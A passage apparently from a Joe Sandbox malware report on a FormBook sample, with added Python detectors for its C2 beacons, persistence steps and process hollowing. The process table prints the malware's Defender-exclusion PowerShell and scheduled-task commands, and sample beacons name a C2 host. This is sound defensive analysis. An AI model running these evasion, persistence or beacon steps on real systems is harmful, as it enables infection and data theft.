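    if method == "GET" and any(k != "np" and len(k) == 4 and len(v) == 5 for k, v in params):
        hits.append("4-char=5-char decoy parameter on GET")
    origin, referer = headers.get("origin"), headers.get("referer")
    if origin and referer and referer == origin + url.path:
        hits.append("Referer equals Origin + path")
    if headers.get("connection", "").lower() == "close":
        hits.append("Connection: close")
    if host_is_windows and "Android" in headers.get("user-agent", ""):
        hits.append("Android User-Agent from a Windows host")
    return hits


def is_formbook_beacon(raw: str, host_is_windows: bool = True, threshold: int = 4) -> bool:
    """Threshold of four traits is an arbitrary choice for this example."""
    return len(formbook_indicators(raw, host_is_windows)) >= threshold


# Constructed samples modelled on sessions 19 and 20 above (np= values shortened).
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530")
NP = "Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw=="

POST_SAMPLE = "\r\n".join([
    "POST /efkd/ HTTP/1.1",
    "Host: www.angelenterprise.biz",
    "Connection: close",
    "Content-Type: application/x-www-form-urlencoded",
    "Origin: http://www.angelenterprise.biz",
    "Referer: http://www.angelenterprise.biz/efkd/",
    "User-Agent: " + UA,
]) + "\r\n\r\nnp=" + NP

GET_SAMPLE = "\r\n".join([
    "GET /efkd/?np=" + NP + "&O4s0=7rrhM HTTP/1.1",
    "Host: www.angelenterprise.biz",
    "Connection: close",
    "User-Agent: " + UA,
]) + "\r\n\r\n"

# Constructed benign request for comparison.
BENIGN_SAMPLE = "\r\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "Connection: keep-alive",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0 Safari/537.36",
]) + "\r\n\r\n"

if __name__ == "__main__":
    for name, sample in [("POST", POST_SAMPLE), ("GET", GET_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, is_formbook_beacon(sample), formbook_indicators(sample))
```

The check on Referer against Origin plus path is the one least likely to appear in ordinary browser traffic for a form POST to the same directory, so it carries the most weight when tuning the threshold; the User-Agent check only holds if the sensor knows the source host's OS.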
              Target ID:0
              Start time:03:01:57
              Start date:18/09/2024
              Path:C:\Users\user\Desktop\New Purchase Order.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0x980000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:3
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0xd10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
              Imagebase:0xd10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"
              Imagebase:0x980000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:03:01:59
              Start date:18/09/2024
              Path:C:\Users\user\Desktop\New Purchase Order.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0xc20000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:10
              Start time:03:02:00
              Start date:18/09/2024
              Path:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Imagebase:0xf40000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 29%, ReversingLabs
              • Detection: 33%, Virustotal, Browse
              Reputation:low
              Has exited:true

              Target ID:11
              Start time:03:02:01
              Start date:18/09/2024
              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Imagebase:0x7ff717f30000
              File size:496'640 bytes
              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
              Has elevated privileges:true
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:03:02:04
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"
              Imagebase:0x980000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:03:02:04
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:14
              Start time:03:02:05
              Start date:18/09/2024
              Path:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
              Imagebase:0xb50000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:16
              Start time:03:02:16
              Start date:18/09/2024
              Path:C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe"
              Imagebase:0x930000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              Target ID:17
              Start time:03:02:18
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\setupugc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\setupugc.exe"
              Imagebase:0xff0000
              File size:118'784 bytes
              MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              Target ID:20
              Start time:03:02:31
              Start date:18/09/2024
              Path:C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe"
              Imagebase:0x930000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Has exited:false

              Target ID:22
              Start time:03:02:44
              Start date:18/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff728280000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Has exited:true

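Triage logic for the persistence and defense-evasion steps in the process list above, as an added example that is not part of this Joe Sandbox report. It runs over process-creation events (Sysmon Event ID 1 or Security 4688 style) and flags the three things a responder would pull out of this table: Add-MpPreference -ExclusionPath pointing into a user-writable location (Targets 3 and 5), schtasks /Create fed an /XML file from %TEMP% (Targets 7 and 12, the same behaviour the Sigma hit in the header refers to), and one binary (MD5 E392C454...) executing from two different paths (Desktop and AppData\Roaming). The event records are constructed from the report's process table; the field names are my own.

```python
"""Triage process-creation events for the persistence and evasion steps
seen in this report. Added example, not part of the Joe Sandbox report."""
import re

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
USER_WRITABLE_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def tokens(cmd: str):
    """Split a Windows command line, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmd)]


def arg_after(toks, flag: str):
    """Value following a case-insensitive switch such as /XML or -ExclusionPath."""
    lowered = [t.lower() for t in toks]
    if flag.lower() in lowered:
        i = lowered.index(flag.lower())
        if i + 1 < len(toks):
            return toks[i + 1]
    return None


def triage(events):
    """Return (event id, finding, detail) tuples; id is None for cross-event findings."""
    findings = []
    paths_by_md5 = {}
    for ev in events:
        toks = tokens(ev["cmd"])
        image = ev["path"].lower()
        if image.endswith("powershell.exe") and any(t.lower() == "add-mppreference" for t in toks):
            excl = arg_after(toks, "-ExclusionPath")
            if excl and USER_WRITABLE_RE.match(excl):
                findings.append((ev["id"], "defender exclusion for user-writable path", excl))
        if image.endswith("schtasks.exe") and any(t.lower() == "/create" for t in toks):
            xml = arg_after(toks, "/XML")
            if xml and TEMP_RE.search(xml):
                findings.append((ev["id"], "scheduled task registered from %TEMP% XML", arg_after(toks, "/TN")))
        paths_by_md5.setdefault(ev["md5"].upper(), set()).add(image)
    for md5, paths in paths_by_md5.items():
        if len(paths) > 1:
            findings.append((None, "same binary executed from multiple paths", md5))
    return findings


# Constructed from the Target ID rows above (id = Target ID).
EVENTS = [
    {"id": 0, "path": r"C:\Users\user\Desktop\New Purchase Order.exe",
     "cmd": r'"C:\Users\user\Desktop\New Purchase Order.exe"',
     "md5": "E392C45451247441D1763095DB3CD57A"},
    {"id": 3, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"},
    {"id": 5, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"},
    {"id": 7, "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"',
     "md5": "48C2FE20575769DE916F48EF0676A965"},
    {"id": 10, "path": r"C:\Users\user\AppData\Roaming\hbaiQWstL.exe",
     "cmd": r"C:\Users\user\AppData\Roaming\hbaiQWstL.exe",
     "md5": "E392C45451247441D1763095DB3CD57A"},
    {"id": 12, "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"',
     "md5": "48C2FE20575769DE916F48EF0676A965"},
    {"id": 16, "path": r"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe",
     "cmd": r'"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe"',
     "md5": "32B8AD6ECA9094891E792631BAEA9717"},
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Note that the exclusion rows in the report ran with administrator privileges (Targets 3 and 5), which is what makes Add-MpPreference succeed; the later re-launch from AppData\Roaming (Targets 10 and 14) did not.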

                Execution Graph

                Execution Coverage:10.9%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:6%
                Total number of Nodes:201
                Total number of Limit Nodes:16
                execution_graph (rendered as a graph on the original page; only the API-bearing nodes of the node dump are kept here)
                • Entry chain: 808ce5e -> 808cbe4 -> 808fac0 -> 808fada, which fans out into the 74d0xxx stubs below
                • 74d0006, 74d0040 -> 808c7bd / 808c7c8 -> CreateProcessA (808c851); 74d0006 continues into ReadProcessMemory
                • 74d042a -> 808c479 / 808c480 -> VirtualAllocEx (808c4c0)
                • 74d02b7, 74d02fe, 74d03c5, 74d04fd -> 808c539 / 808c540 -> WriteProcessMemory (808c588)
                • 74d0260, 74d041f, 74d0af4 -> 808c628 / 808c630 -> ReadProcessMemory (808c67b)
                • 74d04de, 74d0712, 74d0796 -> 808bf68 / 808bf70 -> Wow64SetThreadContext (808bfb5)
                • 74d0463, 74d0600, 74d0617, 74d0796, 74d0bc3 -> 808beb8 / 808bec0 -> ResumeThread (808bf00)
                • 74d0ed0 -> 74d1148 / 74d1150 -> PostMessageW
                • 2cfd788 -> DuplicateHandle
                • 2cf4668 -> 2cf4778 -> 2cf4879 / 2cf4888 -> 2cf44e0 -> CreateActCtxA (2cf5918)
                • 2cf4218 -> 2cf5cec -> 2cf5d0c -> 2cf5d3c -> 2cf5d6c -> 2cfad71 -> 2cfb1a0 / 2cfb1b0 -> 2cfb299 -> GetModuleHandleW (2cfb4e0); also 2cfce61 -> 2cfd418 / 2cfd428 -> 2cfd230 -> GetModuleHandleW
                • 2cfd540 -> GetCurrentProcess (2cfd586), GetCurrentThread (2cfd5d8), GetCurrentProcess (2cfd615), GetCurrentThreadId (2cfd673)
                Read together, the CreateProcessA / VirtualAllocEx / WriteProcessMemory / Wow64SetThreadContext / ResumeThread nodes in the 74d0000 region are the process-hollowing primitive behind the "Injects a PE file into a foreign processes" and "Modifies the context of a thread in another process" signatures in the header.
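An order-sensitive matcher for the hollowing chain above, as an added example that is not part of this Joe Sandbox report. It consumes an API trace as a list of (api name, arguments) records keyed by the process and thread handles the calls return and take, and reports a child only when it was written to, had its thread context replaced, and was then resumed; a plain suspended launch that is resumed untouched is not reported. The sample trace is constructed to mirror the graph's call order; the dwCreationFlags value, handle values and PID are assumptions, since the report does not show them.

```python
"""Order-sensitive detector for the process-hollowing API chain.
Added example, not part of the Joe Sandbox report; the trace is constructed."""

CREATE_SUSPENDED = 0x00000004
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext"}
MEMORY_APIS = {"VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}


def detect_hollowing(trace):
    """Return one finding per child process that received WriteProcessMemory
    and a thread-context change before ResumeThread on its primary thread."""
    procs = {}    # hProcess -> {"pid", "suspended", "apis"}
    threads = {}  # hThread -> hProcess
    findings = []
    for api, a in trace:
        if api in ("CreateProcessA", "CreateProcessW"):
            procs[a["hProcess"]] = {
                "pid": a["dwProcessId"],
                "suspended": bool(a.get("dwCreationFlags", 0) & CREATE_SUSPENDED),
                "apis": set(),
            }
            threads[a["hThread"]] = a["hProcess"]
        elif api in MEMORY_APIS and a.get("hProcess") in procs:
            procs[a["hProcess"]]["apis"].add(api)
        elif api in CONTEXT_APIS and threads.get(a.get("hThread")) in procs:
            procs[threads[a["hThread"]]]["apis"].add(api)
        elif api == "ResumeThread":
            hproc = threads.get(a.get("hThread"))
            st = procs.get(hproc)
            if st and "WriteProcessMemory" in st["apis"] and st["apis"] & CONTEXT_APIS:
                findings.append({"pid": st["pid"], "suspended": st["suspended"],
                                 "apis": sorted(st["apis"])})
                del procs[hproc]
    return findings


# Constructed trace in the graph's order: CreateProcessA -> ReadProcessMemory ->
# VirtualAllocEx -> WriteProcessMemory (several) -> Wow64SetThreadContext -> ResumeThread.
# Handle values, PID and dwCreationFlags are assumed; they are not in the report.
HOLLOW_TRACE = [
    ("CreateProcessA", {"lpApplicationName": r"C:\Users\user\Desktop\New Purchase Order.exe",
                        "dwCreationFlags": CREATE_SUSPENDED,
                        "hProcess": 0x1A4, "hThread": 0x1A8, "dwProcessId": 4104}),
    ("ReadProcessMemory", {"hProcess": 0x1A4}),
    ("VirtualAllocEx", {"hProcess": 0x1A4, "dwSize": 0x2E000}),
    ("WriteProcessMemory", {"hProcess": 0x1A4}),
    ("WriteProcessMemory", {"hProcess": 0x1A4}),
    ("WriteProcessMemory", {"hProcess": 0x1A4}),
    ("Wow64SetThreadContext", {"hThread": 0x1A8}),
    ("ResumeThread", {"hThread": 0x1A8}),
]

# A suspended launch that is resumed without being touched must not fire.
BENIGN_TRACE = [
    ("CreateProcessA", {"lpApplicationName": r"C:\Windows\System32\conhost.exe",
                        "dwCreationFlags": CREATE_SUSPENDED,
                        "hProcess": 0x2B0, "hThread": 0x2B4, "dwProcessId": 5212}),
    ("ResumeThread", {"hThread": 0x2B4}),
]

if __name__ == "__main__":
    print(detect_hollowing(HOLLOW_TRACE))
    print(detect_hollowing(BENIGN_TRACE))
```

Keying on handles rather than PIDs matters in practice: the injector never names the child's PID in the write and context calls, only the handles CreateProcess returned, so a matcher that cannot follow handles misses the chain.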
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (
                • API String ID: 0-3887548279
                • Opcode ID: ebcbbbfa7f351416fea88705d29ffa82dd1b5ba1fed6e6b5b9a7924c3c539de0
                • Instruction ID: 71d69c5902de1d3b9cc28d02a63cdd1e20c5c890d5e22dfb524f900439fcec66
                • Opcode Fuzzy Hash: ebcbbbfa7f351416fea88705d29ffa82dd1b5ba1fed6e6b5b9a7924c3c539de0
                • Instruction Fuzzy Hash: D291F4B1D19229CFDB24CF66C8547EDBBB6BF9A300F0095AAD449A7250EB705E85CF40
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a8a85044744f54851b3e7e512d0547e863cebf9b2dd861f1d4df4082ff7625e5
                • Instruction ID: 5f098241db23400bacfcff1f92b9d0f6936a4dbf9bc65af8dcb0fe123df367f6
                • Opcode Fuzzy Hash: a8a85044744f54851b3e7e512d0547e863cebf9b2dd861f1d4df4082ff7625e5
                • Instruction Fuzzy Hash: E9E1ABB0B006069FDB59DB65C860BAFB7F6AF89300F14446ED6899B390CB70ED02CB51
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f1e3f692e5cec98b5b82e189d009f3ab67543f03b29b56b9a5b913363e2c1a3a
                • Instruction ID: c99dd02b8b8313531c3d91165a77225f8871da220cdb6f75cd05ee3e60642207
                • Opcode Fuzzy Hash: f1e3f692e5cec98b5b82e189d009f3ab67543f03b29b56b9a5b913363e2c1a3a
                • Instruction Fuzzy Hash: 4AE0E5B481D384CFCB128F70E8695E8BFB8AB0B315F0525D6984D9B262D7349D86CE06

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 02CFD5BE
                • GetCurrentThread.KERNEL32 ref: 02CFD5FB
                • GetCurrentProcess.KERNEL32 ref: 02CFD638
                • GetCurrentThreadId.KERNEL32 ref: 02CFD691
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: f524b3177d5f74c706681bf0c702ae05c91a927a32d746ba2c02181cbeef1910
                • Instruction ID: e83f2866c141737661ce0293a7c5f8daa1fe1bc1eb7f813d26bd4a10f408eb20
                • Opcode Fuzzy Hash: f524b3177d5f74c706681bf0c702ae05c91a927a32d746ba2c02181cbeef1910
                • Instruction Fuzzy Hash: BB5169B09003498FDB94CFA9D548B9EBBF1BF89318F20845AE509A73A0DB745944CB65

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 02CFD5BE
                • GetCurrentThread.KERNEL32 ref: 02CFD5FB
                • GetCurrentProcess.KERNEL32 ref: 02CFD638
                • GetCurrentThreadId.KERNEL32 ref: 02CFD691
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: a435038ee65755a3fdd74906819327e2dda6f7940e0200526c22fcaa932fa961
                • Instruction ID: 80bf1d7669aa864e0f3093782029b8e64edf6e1be504d5be79e9c033d215df05
                • Opcode Fuzzy Hash: a435038ee65755a3fdd74906819327e2dda6f7940e0200526c22fcaa932fa961
                • Instruction Fuzzy Hash: E75148B09003498FDB94CFA9D648B9EBBF1FF88318F208459E509A73A0DB745944CF65

                Control-flow Graph

                • Executed / Not Executed (the colouring of the rendered graph is not recoverable from this text dump)
                control_flow_graph for 808c7bd..808cb0d, kept here as a summary of the node list: the entry block 808c7bd-808c85d leads through three stretches that each contain a tight self-looping block (808c87d-808c88c, 808c8d6-808c8e5, 808c93e-808c94d) into block 808c957-808ca11, which makes the CreateProcessA call; its successors 808ca13-808ca19 and 808ca1a-808caa0 continue through a chain of small blocks (808caa2 ... 808cb06) that ends in the self-looping block 808cb0d.
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0808C9FE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: b39b7f754cb84f69b8d850a067f874d4b7378e385c19caa75c9f958d4fed1bcd
                • Instruction ID: d9c87e001a5b1642eef819826e7293d5f37ce2d7ca6d7409b3b90a41c461e3a0
                • Opcode Fuzzy Hash: b39b7f754cb84f69b8d850a067f874d4b7378e385c19caa75c9f958d4fed1bcd
                • Instruction Fuzzy Hash: EEA15971D00259DFEFA0DF68C8817EDBBF2AF48315F1481A9E849A7240DB749985CFA1

                Control-flow Graph
